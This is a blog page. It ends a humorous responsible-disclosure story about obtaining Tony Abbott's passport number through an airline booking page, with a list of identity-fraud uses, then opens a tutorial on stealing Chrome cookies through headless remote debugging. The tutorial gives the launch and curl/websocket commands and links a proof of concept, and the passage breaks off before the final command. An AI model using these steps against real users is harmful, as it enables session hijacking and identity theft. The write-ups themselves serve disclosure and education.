<h3 id="wikipedia-stalking">Wikipedia stalking</h3>
<p>Apparently Prime Ministers themselves have “ministers” (not prime), and those are their staff. That’s who I was looking for.</p>
<p><img src="/img/sunburnt-country/ministers.png" alt="Screenshot of Tony Abbott's former staff-medium" />
<em>Big “me and the boys” energy</em></p>
<p>Okay but, the problem was that most of these people are retired now, and the glory days of 2013 are over. Each time I hover over one of their names, I see “so-and-so is a former politician and….” and discard their Wikipedia page like a <a href="https://cdn0.woolworths.media/content/wowproductimages/large/248197.jpg">LeSnak</a> wrapper into the wind.</p>
<p>Eventually though, I saw <em>this</em> minister.</p>
<p><img src="/img/sunburnt-country/scomo-minister.png" alt="Screenshot of Scomo in the list" />
<em>Oh he definitely has an office.</em></p>
<p>That’s the <em>current</em> Prime Minister of Australia (at the time of writing, that is, for all I know we’re three Prime-Ministers deep into 2020 by the time you read this), you know he’s <em>definitely</em> gonna be easier to find.</p>
<h3 id="lets-call-the-prime-ministers-office-i-guess">Let’s call the Prime Minister’s office I guess?</h3>
<p>Easy google of the number, absolutely no emotional journey resulting in my growth as a person this time.</p>
<hr />
<p>When I call, I hear what sounds like two women laughing in the background? One of them answers the phone, slightly out of breath, and says “Hello, Prime Minister’s office?”. I’m like “….hello? Am I interrupting something???”.</p>
<p>I clumsily explain that I know this is Scott Morrison’s office, but I actually was wondering if they had Tony Abbott’s contact details, because it’s for “a time-sensitive media enquiry”<sup id="fnref:magicwords" role="doc-noteref"><a href="#fn:magicwords" class="footnote" rel="footnote">17</a></sup>, and I j-
She interrupts to explain “so Tony Abbott isn’t Prime Minister anymore, this is Scott Morrison’s office” and I’m like “yA I <em>know</em> please I am desperate for these contact details”.</p>
<p>She says “We wouldn’t have that information but I’ll just check for you” and then pauses for like, a long time? Like 15 seconds? I can only wonder what was happening on the other end. Then she says “Oh actually I can give you Tony Abbott’s personal assistant’s number? Is that good?”.</p>
<p>Ummmm YES thanks that’s what I’ve been looking for this whole time? Anyway brb i gotta go be uh a journalist or something.</p>
<h3 id="calling-tony-abbotts-personal-assistants-personal-assistant">Calling Tony Abbott’s personal assistant’s personal assistant</h3>
<p>I fumble with my phone, furiously trying to dial the number.</p>
<p>I ask if I’m speaking to Tony Abbott’s personal assistant. The person on the other end says no, but he <em>is</em> one of Tony Abbott’s staff. It has been a long several months of calling people. The cold ice is starting to thaw. One day, with enough therapy, I may be able to gather the emotional resources necessary to call another government phone number.</p>
<p>I explain the security issue I want to report, and midway through he interrupts with “sorry…. <em>who</em> are you and what’s the organisation you’re calling from?” and I’m like “uhhhh I mean my name is Alex and uhh I’m not calling from any organisation I’m just like a person?? I just found this thing and…”.</p>
<p>The person is mercifully forgiving, and says that he’ll have to call me back. I stress once again that I’m calling to help them, happy to wait to publish until they feel comfortable, and definitely do not warrant the bulk-installation of antivirus products.</p>
<h3 id="calling-tony-abbotts-personal-assistant">Calling Tony Abbott’s personal assistant</h3>
<p>An hour later, I get a call from a number I don’t recognise.</p>
<p>He explains that the guy I talked to earlier was <em>his</em> assistant, and he’s Tony Abbott’s PA. Folks, we made it. It’s as easy as that.</p>
<p>He says he knows what I’m talking about. He’s got <em>the emails</em>. He’s already in the process of getting Tony Abbott a new passport number. This is the stuff. It’s all coming together.</p>
<p>I ask if I can publish a blog post about it, and we agree I’ll send a draft for him to review.</p>
<p>And <em>then</em> he says</p>
<h3 id="these-things-do-interest-him---hes-quite-keen-to-talk-to-you">“These things do interest him - he’s quite keen to talk to you”</h3>
<p>I was like exCUSE me? Tony Abbott, Leader of the <a href="https://en.wikipedia.org/wiki/Abbott_Ministry">69th Ministry of Australia</a>, wants to call me on the <em>phone</em>? I suppose I owe this service to my country?</p>
<p>This story was already completely cooked so sure, whatever. I’d already declared emotional bankruptcy, so nothing was coming as a surprise at this point.</p>
<p>I asked what he wanted to talk about. “Just to pick your brain on these things”. We scheduled a call for 3:30 on Monday.</p>
<h3 id="and-then-tony-abbott-just-calls-me-on-the-phone">And then Tony Abbott just… calls me on the phone?</h3>
<p>Mostly, he wanted to check whether his understanding of how I’d found his passport number was correct (it was). He also wanted to ask me how to learn about “the IT”.</p>
<p>He asked some intelligent questions, like “how much information is in a boarding pass, and what do people like me need to know to be safe?”, and “why can you get a passport number from a boarding pass, but not from a bus ticket?”.</p>
<p>The answer is that boarding passes have your password printed on them<sup id="fnref:airline" role="doc-noteref"><a href="#fn:airline" class="footnote" rel="footnote">18</a></sup>, and bus tickets don’t. You can use that password to log in to a <em>website</em> (widely regarded as a bad move), and at that point all bets are off, websites can just do whatever they want.</p>
<p>He was vulnerable, too, about how computers are harder for him to understand.</p>
<blockquote>
<p>“It’s a funny old world, today I tried to log in to a [Microsoft] Teams meeting (Teams is one of those apps), and the fire brigade uses a Teams meeting. Anyway I got fairly bamboozled, and I can now log in to a Teams meeting in a way I couldn’t before<sup id="fnref:recording" role="doc-noteref"><a href="#fn:recording" class="footnote" rel="footnote">19</a></sup>.</p>
</blockquote>
<blockquote>
<p>It’s, I suppose, a terrible confession of how people my age feel about this stuff.”</p>
</blockquote>
<p>Then the Earth stopped spinning on its axis.</p>
<p>For an instant, time stood still.</p>
<p>Then he said it:</p>
<blockquote>
<p>“You could drop me in the bush and I’d feel perfectly confident navigating my way out, looking at the sun and direction of rivers and figuring out where to go, but this! Hah!”</p>
</blockquote>
<p>This was possibly the most pure and powerful Australian energy a human can possess, and explains how we elected our strongest as our leader. The raw energy did in fact travel through the phone speaker and directly into my brain, killing me instantly.</p>
<p>When I’d collected myself from various corners of the room, he asked if there was a book about the basics of IT, since he wanted to learn about it. That was kinda humanising, since it made me realise that even famous people are just people too.</p>
<p>Anyway I hadn’t heard of a book that was any good, so I told a story about my mum instead.</p>
<h5 id="a-story-about-my-mum-instead">A story about my mum instead</h5>
<p>I said there probably was a book out there about “the basics of IT”, but it wouldn’t help much. I didn’t learn from a book. 13 year old TikTok influencers don’t learn from a book. They just <em>vibe</em>.</p>
<p>My mum<sup id="fnref:himum" role="doc-noteref"><a href="#fn:himum" class="footnote" rel="footnote">20</a></sup> always said when I was growing up that:</p>
<ol>
<li>There were “too many buttons”</li>
<li>She was afraid to press the buttons, because she didn’t know what they did</li>
</ol>
<p>I can understand that, since grown ups don’t have the sheer dumb hubris of a child, and that’s what makes them afraid of the buttons.</p>
<p>Like, when a toddler uses a spoon for the first time, they don’t know what a spoon is, where they are, or who the current Prime Minister is. But they see the spoon, and they see the cereal, and their dumb baby brain is just like “yeA” and they have a red hot go<sup id="fnref:spoon" role="doc-noteref"><a href="#fn:spoon" class="footnote" rel="footnote">21</a></sup>. And like, they get it wrong the first few times, but it doesn’t matter, because they don’t know to be afraid of getting it wrong. So eventually, they get it right.</p>
<p><img src="/img/sunburnt-country/baby-spoon.jpg" alt="yeA" />
<em>leaked footage of me learning how to hack</em></p>
<p>Okay so I didn’t tell the spoon thing to Tony Abbott, but I did tell him what I always told my mum, which was: “Mum you just gotta press <em>all</em> the buttons, to find out what they do”<sup id="fnref:mum" role="doc-noteref"><a href="#fn:mum" class="footnote" rel="footnote">22</a></sup>.</p>
<p>He was like “Oh, you just learn by trial and error”. Exactly! Now that I think about it, it’s a bit scary. We are dumb babies learning to use a spoon for the first time, except if you do it wrong some clown writes a blog post about you. Anyway good luck out there to all you big babies.</p>
<h5 id="asking-to-publish-this-blog-post">Asking to publish this blog post</h5>
<p>When I asked Tony Abbott for permission to publish the post you are reading right now while neglecting your responsibilities, he said “well look Alex, I don’t have a problem with it, you’ve alerted me to something I probably should have known about, so if you wanna do that, go for it”.</p>
<p>At the end of the call, he said “If there’s ever anything you think I need to know, give us a shout”.</p>
<p>Look you gotta hand it to him. That’s exactly the right way to respond when someone tells you about a security problem. Back at the beginning, I was kinda worried that he might misunderstand, and think I was trying to hack him or something, and that I’d be instantly slam dunked into jail. But nope, he was fine with it. And now you, a sweet and honourable blog post browser, get to learn the dangers of posting your boarding pass by the realest of real-world examples.</p>
<p>During the call, I was completely in shock from the lost in the bush thing killing me instantly, and so on. But afterwards, when I looked at the quotes, I realised he just wanted to understand what had happened to him, and more about how technology works. That’s the same kind of curiosity <em>I</em> had, that started this whole surrealist three-act drama. That… wasn’t really what I was expecting from Tony Abbott, but it’s what I found.</p>
<p>The point of this story isn’t to say “wow Tony Abbott got hacked, what a dummy<sup id="fnref:dummy" role="doc-noteref"><a href="#fn:dummy" class="footnote" rel="footnote">23</a></sup>”. The point is that if someone famous can unknowingly post their boarding pass, anyone can.</p>
<p>Anyway that’s why I vote right wing now baybeeeee.</p>
<hr />
<ul>
<li>☑️ figure out whether i have done a crime</li>
<li>☑️ notify someone (The Government) that this happened</li>
<li>☑️ get permission to publish this here blog post</li>
<li>☑️ tell qantas about the security issue so they can fix it</li>
</ul>
<h1 id="act-3-closing-credits">Act 3: Closing credits</h1>
<p><img src="/img/sunburnt-country/donotgetarrestedchallenge2020.png" alt="Do Not Get Arrested Challenge 2020" /></p>
<h2 id="wait-no-what-the-heck-did-i-just-read">Wait no what the heck did I just read</h2>
<p>Yeah look, reasonable.</p>
<h4 id="tl-dr">tl; dr</h4>
<p>Your boarding pass for a flight can sometimes be used to get your passport number. Don’t post your boarding pass or baggage receipt online, keep it as secret as your passport.</p>
<h4 id="how-it-works">How it works</h4>
<p>The Booking Reference on the boarding pass can be used to log in to the airline’s “Manage Booking” page, which sometimes contains the passport number, depending on the airline. I saw that Tony Abbott had posted a photo of his boarding pass on Instagram, and used it to get his passport details, phone number, and internal messages between Qantas flight staff about his flight booking.</p>
<h2 id="why-did-you-do-this">Why did <em>you</em> do this?</h2>
<p>One day, my friend who was also in “the group chat” said “I was thinking…. why didn’t <em>I</em> hack Tony Abbott?<sup id="fnref:understanding" role="doc-noteref"><a href="#fn:understanding" class="footnote" rel="footnote">24</a></sup> And I realised I guess it’s because you have more hubris”.</p>
<p>I was deeply complimented by this, but that’s not the point. The point is that you, too, can have hubris.</p>
<p>You know how they say to commit a crime (which once again I insist did not happen in my case) you need means, motive, and opportunity? Means is the ability to use <code class="language-plaintext highlighter-rouge">right click > Inspect Element</code>, motive is hubris, and opportunity is the dumb luck of having my friend message me the Instagram post.</p>
<p>I know, I’ve been saying “hubris” a lot. I mean “the willingness to risk breaking the rules”. Now hold up, don’t go outside and do crimes (unless it’s really funny). I’m not talking about breaking the <em>law</em>, I’m talking about rules we just follow without realising, like social rules and conventions.</p>
<p>Here’s a simple example. You’re at a sufficiently fancy restaurant, like I dunno, with white tablecloths or something? The waiter asks if you’d like “still or sparkling water?”</p>
<p>If you say “still”, it costs Eleven Dollars. If you say “sparkling”, it costs Eleven Dollars and tastes all gross and fizzy. But if you say “tap water, please”, you just get tap water, what you wanted in the first place?</p>
<p>When I first saw someone do this I was like “you can <em>do</em> that? I just thought you had to pay Eleven Dollars extra at fancy restaurants!”.</p>
<p>It’s not written down anywhere that you can ask for tap water. But when I found out you <em>could</em> do that, and like, nothing bad happens, I could suddenly do it too. Miss me with that Eleven Dollars fizzy water.</p>
<p>Basically, until you’ve broken the rules, the idea that the rules can be broken might just not occur to you. That’s how it felt for me, at least.</p>
<p>In conclusion, to be a hacker u ask for tap water.</p>
<h1 id="faq">FAQ</h1>
<h3 id="why-is-it-bad-for-someone-else-to-have-your-passport-number">Why is it bad for someone else to have your passport number?</h3>
<p>Hey crime gang, welcome back to Identity Fraud tips and tricks with Alex.</p>
<p>A passport is government-issued ID. It’s how you prove you’re you. The fact that you have your passport and I don’t is how you prevent <em>me</em> from convincing the government that I’m you and doing crimes in your name<sup id="fnref:notthat" role="doc-noteref"><a href="#fn:notthat" class="footnote" rel="footnote">25</a></sup>.</p>
<p>Just having the information on the passport is not quite as powerful as a photo of the full physical passport, with your photo and everything.</p>
<p>With your passport number, someone could:</p>
<ul>
<li>Book an international flight as you<sup id="fnref:noflyzone" role="doc-noteref"><a href="#fn:noflyzone" class="footnote" rel="footnote">26</a></sup>.</li>
<li>Apply for anything that requires proof of identity documentation with the government, e.g. Working with children check</li>
<li>Activate a SIM card (and so get an internet connection that’s traceable to you, not them, hiding them from the government)</li>
<li>Create a fake physical passport from a template, with the correct passport number (which they then use to cross a border, open a bank account, or anything)</li>
<li>who knows what else, not me, bc i have never done a crime</li>
</ul>
<h3 id="am-i-a-big-bozo-a-big-honking-goose-if-i-post-my-boarding-pass-on-instagram">Am I a big bozo, a big honking goose, if I post my boarding pass on Instagram?</h3>
<p>Nah, it’s an easy mistake to make. How are you supposed to know not to? It’s not obvious that your boarding pass is secret, like a password. I think it’s on the airline to inform you on the risks you’re taking when you use their stuff.</p>
<p><em>But</em> now that you’ve read this blog post, I regret to inform you that you <em>will</em> in fact be an entire sack of geese if you go and post your boarding pass now.</p>
<h3 id="when-did-all-of-this-happen">When did all of this happen?</h3>
<ul>
<li>March 22 - <a href="https://instagram.com/hontonyabbott">@hontonyabbott</a> posts a picture of a boarding pass and baggage receipt. I log in to the website and get the passport number, phone number, and internal Qantas comments.</li>
<li>March 24 - I contact the Australian Signals Directorate (ASD) and let them know what happened.</li>
<li>March 27 - ASD tells me their investigation is complete, I send them a shakas gif, and they thank me for being a good citizen.</li>
<li>March 29 - I learn from lawyers that I have not done a crime 💯</li>
<li>March 30 - I contact Qantas and tell them about the vulnerability.</li>
<li>May 1 - Tony Abbott calls me, we chat about being dropped in the middle of the bush.</li>
<li>July 17 - <em>Paper Mario: The Origami King</em> is released for Nintendo Switch.</li>
<li>August 21 - Qantas emails me saying the security problem has been fixed.</li>
<li>September 13 - Various friends finish reviewing this post <3</li>
<li>September 15 - Tony Abbott and Qantas review this post.</li>
<li>Today - You read this post instead of letting it read you, nice job you.</li>
</ul>
<h3 id="im-bored-and-tired">I’m bored and tired</h3>
<p>Let me answer that question,,, with a question.</p>
<p>Maybe try drinking some water you big goose. Honk honk, I’m so dehydrated lol. That’s you.</p>
<h3 id="honk-honk-honk-honl">honk honk honk honl</h3>
<p>Yeah, exactly.</p>
<p><br />
<br />
<br />
<br />
<br /></p>
<hr />
<p><em>I wrote this because I can’t go back to the Catholic church ever since they excommunicated me in 1633 for insisting the Earth revolves around the sun.</em></p>
<p><em>You can talk to me about it by sliding into my DMs in <a href="https://twitter.com/mangopdf">the tweet zone</a> or, if you must, <a href="mailto:operation.sunburnt.country@gmail.com">email</a>.</em></p>
<hr />
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:groupchat" role="doc-endnote">
<p>It’s one of those group chats where the name is constantly changing and you have no idea who “illegally downloaded plant farmer” is. <a href="#fnref:groupchat" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:kevin07" role="doc-endnote">
<p>Except Kevin Rudd, but that was <em>one time</em> and we were kinda going through some stuff. <a href="#fnref:kevin07" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:hoggemoade" role="doc-endnote">
<p>As for my friend’s nickname being “𝖍𝖔𝖌𝖌𝖊 𝖒𝖔𝖆𝖉𝖊”, I will not be providing context at this time. <a href="#fnref:hoggemoade" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:onbehalf" role="doc-endnote">
<p>On behalf of <em>another</em> friend, my many friends a consequence of my outstanding patriotic efforts towards continuing to avoid subversion of the Commonwealth of Australia. <a href="#fnref:onbehalf" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:nocrime" role="doc-endnote">
<p>To be clear, I didn’t want to go do some fun casual identity fraud, I just wanted to know if he <em>had</em> posted something secret, since uh, someone should probably do something about that if it were true (I insist, as they drag me away). <a href="#fnref:nocrime" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:step3" role="doc-endnote">
<p>You can’t just <em>have</em> step 3. You have to <em>earn it</em>. <a href="#fnref:step3" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:lastname" role="doc-endnote">
<p>The last name is printed on the baggage receipt, too. So even if I didn’t know who posted the picture, everything you need to manage the booking is right there on the baggage receipt in a neat little package. <a href="#fnref:lastname" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:name" role="doc-endnote">
<p>Which was actually “Anthony Abbott” #exposed <a href="#fnref:name" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:holt" role="doc-endnote">
<p>Harold Holt was another former Prime Minster and we… lost him? He disappeared while going for a swim one morning. This is not a joke. We named <a href="https://en.wikipedia.org/wiki/Harold_Holt_Memorial_Swimming_Centre">Harold Holt Memorial Swim Centre</a> after him. I repeat, this is <em>not</em> a joke. <a href="#fnref:holt" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:brain" role="doc-endnote">
<p>after years of practice, i now think entirely in lowercase <a href="#fnref:brain" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:calculations" role="doc-endnote">
<p>I’ve always wanted to say that. <a href="#fnref:calculations" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:noplan" role="doc-endnote">
<p>I’m not really sure what my plan was. If I had done a crime, what was I gonna do, not report the passport number being publicly available? <a href="#fnref:noplan" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:underconstruction" role="doc-endnote">
<p>Tony Abbott’s personal assistant later told me that the form was broken because the website was in the middle of some construction/upgrading. <a href="#fnref:underconstruction" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:prize" role="doc-endnote">
<p>Or it <em>was</em>, at least. It’s something else now, since otherwise it wouldn’t be a surprise 👀 <a href="#fnref:prize" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:qantasemail" role="doc-endnote">
<p>One way to fix this problem would be to stop including the passenger’s PNR, passport number, or PNR remarks in the HTTP server’s response for “tripflow.redirect.html”. I’m also planning on publishing a blog post on a personal website describing this issue. If Qantas would prefer that I do not publicly disclose this issue until the issue has been fixed, just let me know. I’m happy to help any way I can, let me know if there’s any more information I can provide. This issue relates to ASD Assist issue OPS-69067 (author’s note: SO CLOSE) with the Australian Signals Directorate. <a href="#fnref:qantasemail" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:spam" role="doc-endnote">
<p>They kept not replying to me, which turned out to be because my emails were getting sent to Junk, presumably because of the illicit hacker keywords contained within. <a href="#fnref:spam" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:magicwords" role="doc-endnote">
<p>These were the magic words my journalist friend told me, for which I will be forever grateful, and keep close to my heart. <a href="#fnref:magicwords" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:airline" role="doc-endnote">
<p>Depending on the airline. <a href="#fnref:airline" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:recording" role="doc-endnote">
<p>I didn’t record our call, I only took notes, so this isn’t a quote, oops. I might have written it down wrong, so nothing in this section has any journalistic integrity, oops again. <a href="#fnref:recording" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:himum" role="doc-endnote">
<p>hi mum <a href="#fnref:himum" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:spoon" role="doc-endnote">
<p>“Nobody gives the baby a knife. You give them a spoon” - Mum, when I showed her this. <a href="#fnref:spoon" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:mum" role="doc-endnote">
<p>But like, I didn’t call <em>him</em> “Mum”, that would be weird, in startling contrast to the rest of this story. <a href="#fnref:mum" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:dummy" role="doc-endnote">
<p>There are many, <em>many</em> blog posts out there roasting Tony Abbott, if that’s what you’re looking for. <a href="#fnref:dummy" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:understanding" role="doc-endnote">
<p>Which was a big misunderstanding, because I stress once again that I did not subvert any Commonwealths of anything, no matter who’s askin’ <a href="#fnref:understanding" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:notthat" role="doc-endnote">
<p>Crimes that I once again stress I have not done. <a href="#fnref:notthat" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:noflyzone" role="doc-endnote">
<p>But not actually fly on it without the physical passport. <a href="#fnref:noflyzone" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>mangopdf (Alex Hope)I went on an emotional rollercoaster. A spiritual journey. I sent a lot of emails. I tried so, so much not to get arrested.Stealing Chrome cookies without a password2018-09-26T05:20:12+00:002018-09-26T05:20:12+00:00/stealing-chrome-cookies-without-root<p>If you steal someone’s Chrome cookies, you can log in to their accounts on <strong>every website</strong> they’re logged in to.</p>
<p>Normally you need the user’s password to do it, but I found a way to do it without the password. You just need to be able to execute code on their computer. It works by using Chrome’s Remote Debugging Protocol.</p>
<p>If you wanna skip this dumb blog post and just get the demo code, here ya go: <a href="https://github.com/defaultnamehere/cookie_crimes">https://github.com/defaultnamehere/cookie_crimes</a>. There’s also a <a href="https://github.com/rapid7/metasploit-framework/blob/9616a9f79de0b22bfd142f12affd74cecbbd4413/documentation/modules/post/multi/gather/chrome_cookies.md">Metasploit module</a>. Don’t spend ‘em all at once.</p>
<p>For how it works and how I found it, you need only <em>find within yourself the strength to scroll this page</em>.</p>
<hr />
<h2 id="step-0-reconsider-your-life-choices">Step 0: Reconsider your life choices</h2>
<p>Imagine that, <em>for some reason</em>, you’ve hacked someone’s computer. I dunno maybe you’re like a spy or something?</p>
<p>Let’s call your fictitious victim, uh, “Naruto”.</p>
<p>Specifically, you’ve got the ability to execute code on Naruto’s computer. That’s like, probably hacking, and you’re already going to be slam jammed into the shadow realm for your crimes, so ya may as well do some more.</p>
<p>One obvious crime you might want to do with this access is to steal Naruto’s Chrome cookies. This would let you log in as him to anything he’s logged in to. Oooooh yeah definitely. Imagine the trouble you could get up to with <em>that</em>.</p>
<p><img src="https://i.imgflip.com/2llk9b.jpg" alt="crimes" /></p>
<h3 id="how-do-cookies-work">How do cookies work?</h3>
<p>You know how you don’t have to log in every time you go to Facebook? How when you go to <code class="language-plaintext highlighter-rouge">facebook.com</code> it just shows you your timeline? How does Facebook know it’s you?</p>
<p>It’s because when you log in to Facebook, Facebook gives you a cookie, which lives on your computer. Next time you go to Facebook, you just <em>show</em> it that cookie, and it lets you in without having to type your password again.</p>
<p>It’s like those wristbands they give you at the club to show you’re of drinking age, except I’m not sure if they still do that because I haven’t been to an Event since the release of Stardew Valley.</p>
<h3 id="and-if-someone-were-tosideways-look-steal-those-cookies">And if someone were to….*sideways look* <em>steal</em> those cookies?</h3>
<p>For example, if you had Naruto’s Facebook cookies, it doesn’t matter whether he has a really good password, 2 Factor Authentication, or is particularly good mates with zucc and the boys.</p>
<p>You can just put Naruto’s Facebook cookie in you own browser, and go to <code class="language-plaintext highlighter-rouge">facebook.com</code>, and you’ll see <em>Naruto’s</em> Facebook account logged in.</p>
<p>It’s as easy as that.</p>
<h3 id="chromes-cookie-security">Chrome’s cookie security</h3>
<p>Let’s assume Naruto, the absolute chap, has OS X - but this works on Windows and Linux too.</p>
<p>Naruto’s delicious, tasty Chrome cookies live in a file on his computer. Cleverly, Chrome encrypts his cookies with its own “Chrome Safe Storage” password. This password lives in Naruto’s Login Keychain, so the only way to get the cookies is to unlock the keychain by typing in his password.</p>
<p>This is a perfectly legit way to get someone’s cookies, but the reason we’re here today is I’m pretty sure I found a way to skip all that.</p>
<p><img src="/img/chrome-cookies/diagram.png" alt="diagram" /></p>
<hr />
<p>Why should we have to decrypt the cookies? After all, Naruto can get his own cookies from Chrome without typing his password. Surely there’s a way to just get Chrome to give us the cookies, if we ask nicely?</p>
<h2 id="step-1-run-headless-chrome">Step 1: Run Headless Chrome</h2>
<p>Chrome can run in headless mode now. This means it can run without actually
having a window displayed. Everything happens in the terminal. This is deeply
powerful and probably going to all go wrong one day.</p>
<h3 id="user-data-directories">User data directories</h3>
<p>Chrome stores your cookies, history, deepest secrets, etc. in a <code class="language-plaintext highlighter-rouge">user-data-dir</code>. By default (if
you have no <a href="https://support.google.com/chrome/answer/2364824?co=GENIE.Platform%3DDesktop&hl=en">Chrome Profiles</a>), this will be <code class="language-plaintext highlighter-rouge">$HOME/Library/Application Support/Google/Chrome/</code>.</p>
<p>Needless to say, this directory is The Good Stuff, and we want to be extremely up in it.</p>
<h3 id="enabling-remote-debugging">Enabling remote debugging</h3>
<p>Because we live in a dystopian future, Chrome allows you to remotely control it for debugging and automation reasons.</p>
<p>We’re going to set up a headless Chrome window, using the same <code class="language-plaintext highlighter-rouge">user-data-dir</code>
as our victim.</p>
<p>This is apparently <a href="https://chromium.googlesource.com/chromium/src/+/HEAD/docs/user_data_dir.md#Chrome-Remote-Desktop-sessions-Linux">not possible</a> according to Google.</p>
<blockquote>
<p>“two running Chrome instances cannot share the same user data directory”</p>
</blockquote>
<p>What, you’re not gonna try it just because a <em>webpage</em> told you not to? Of course we are.</p>
<p>Here’s what to run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome \
--headless \
--user-data-dir="$HOME/Library/Application Support/Google/Chrome/" \
https://gmail.com \
--remote-debugging-port=9222
</code></pre></div></div>
<p>This sets remote debugging listening on <code class="language-plaintext highlighter-rouge">localhost:9222</code> (the default port for
Chrome Remote Debugging, now <em>that’s</em> stealthy). It won’t open a browser window, either. We need to tell headless Chrome browse to something so we can open a tab and start debugging it. You can replace <code class="language-plaintext highlighter-rouge">gmail.com</code> with anything you like.</p>
<p>At this point, you can view any page as if Naruto opened it in a new tab (and so, see all his Facebook messages, in our example). You can do that by adding <code class="language-plaintext highlighter-rouge">--dump-dom</code> to the command above, which will print out the HTML of the page you ask for (<code class="language-plaintext highlighter-rouge">gmail.com</code> above). But that seems a bit tedious, not very stealthy, and we can do better than that if we just <em>believe</em>.</p>
<p>Normally, you’re supposed to like, open a <em>second</em> Chrome, point it at the first Chrome, and use it to debug Chrome itself. Ya we’re not gonna do that. We’re gonna remotely debug Chrome with <code class="language-plaintext highlighter-rouge">curl</code>.</p>
<p>C’mon don’t act like this isn’t absolutely <em>wild</em>. There are some things humans were just never meant to do.</p>
<h2 id="step-2-remotely-debug-headless-chrome">Step 2: Remotely debug Headless Chrome</h2>
<p>Through furious and intense googling, I learned that it might be possible to get cookies out of Chrome by remotely debugging it. So, I set off to learn how Chrome’s Remote Debugging works.</p>
<p>Basically, that remote debugging port (<code class="language-plaintext highlighter-rouge">localhost:9222</code>) is waiting for you to speak some janky websocket protocol, in which you can issue commands to Chrome. If you know how to say the command, Chrome will just…. do it.</p>
<h3 id="sidenote-the-chrome-dev-tools-are-absolutely-loose">Sidenote: The Chrome Dev Tools are absolutely Loose</h3>
<p>When I was trying to figure out whether this was possible, I stumbled across this page: <a href="https://chromedevtools.github.io/devtools-protocol/">https://chromedevtools.github.io/devtools-protocol/</a></p>
<p>This is some documentation for the Protocol used by the Chrome Developer Tools (<code class="language-plaintext highlighter-rouge">Right Click > Inspect Element</code>, our trusted friend and ally). Presumably, on this page, some nice people at Google are graciously going to explain to me, an Outsider, how to use their Ancient and Powerful magic.</p>
<p>They say “hey, if you want to remotely debug Chrome, you need to speak the Remote Debugging Protocol.”
I’m ready for this page to teach me about how to remotely debug Chrome, but it says “we don’t release that kind of information to punks like you”.</p>
<p>They casually tell you to sniff and reverse-engineer the protocol if you want to know how it works, since the only client that speaks it is the Chrome Dev Tools themselves. The way they tell you to sniff it is using the Chrome Dev Tools to debug the <em>CHROME DEV TOOLS THEMSELVES</em>, and view the websocket data that the <em>first</em> set of Chrome Dev Tools is sending. The ease with which they suggest this solution is quite stressful.</p>
<p>Finally, they have a section called “How is the protocol defined?”, which has two links to json files you’re supposed to read, both of which 404.</p>
<h3 id="how-the-heck-does-remote-debugging-work">How the heck does Remote Debugging work?</h3>
<p>According to the Cursed Document linked above, there’s a secret, barely documented <code class="language-plaintext highlighter-rouge">/json</code> endpoint on the remote debugging port. Let’s view it.</p>
<p>In a new terminal window, run</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ curl -s localhost:9222/json
[ {
"description": "",
"devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A",
"id": "7404BF41DC4E7512E0431577BABCE18A",
"title": "about:blank",
"type": "page",
"url": "about:blank",
"webSocketDebuggerUrl": "ws://localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A"
} ]
</code></pre></div></div>
<p>See that <code class="language-plaintext highlighter-rouge">webSocketDebuggerUrl</code>? That’s what we want.</p>
<h2 id="step-3-issue-the-command-over-the-websocket-protocol">Step 3: Issue the command over the websocket protocol</h2>
<p>With the magic URL we got in the previous step, we can now speak the Ancient Language to control Chrome.</p>
<p>First we’ll need something that can speak the websocket language. You can use anything, but I googled for some tool called <code class="language-plaintext highlighter-rouge">wsc</code>. In the <a href="https://github.com/defaultnamehere/cookie_crimes">proof-of-concept</a> (which I made just for you) the whole thing is done in Python, so you don’t need this.</p>
<h3 id="speak-the-ancient-language">Speak the Ancient Language</h3>
<p>Ready? Let’s do it</p>
<p>Using <code class="language-plaintext highlighter-rouge">wsc</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wsc ws://localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A
Connected to ws://localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A
>
</code></pre></div></div>
<p>Oooh. Looks like a command prompt. If we knew what to type here, we could tell Chrome what to do.</p>
<p>I’m going to save you the 50 open Chrome tabs, reading of Ruby from 2012 on GitHub, and <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=668932">discovery of the very bug report which created this feature</a> and just show you the command.</p>
